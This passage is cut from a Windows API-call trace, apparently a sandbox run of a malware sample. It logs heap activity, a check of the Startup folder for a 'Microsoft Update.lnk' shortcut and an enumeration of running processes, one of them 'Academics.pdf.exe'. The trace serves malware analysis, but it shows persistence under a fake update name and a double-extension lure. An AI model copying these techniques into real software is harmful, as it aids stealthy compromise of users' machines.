lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0298.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0298.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0298.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0298.769] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0298.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0298.769] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0298.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0298.770] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0298.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0298.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0298.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0298.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0298.771] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0298.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0298.772] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0298.772] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0298.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0298.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0298.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0298.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0298.772] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0298.774] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0298.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0298.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0298.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0298.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0298.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0298.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0298.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.784] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.785] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.787] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0298.788] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0298.790] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.791] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0298.792] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0298.793] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0298.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0298.795] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0298.796] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0298.797] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0298.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0298.799] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0298.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0298.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0298.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0298.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0298.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0298.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0298.805] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0298.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0298.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0298.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0298.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0298.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0298.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0298.813] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0298.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0298.816] CloseHandle (hObject=0x294) returned 1 [0298.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0298.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: 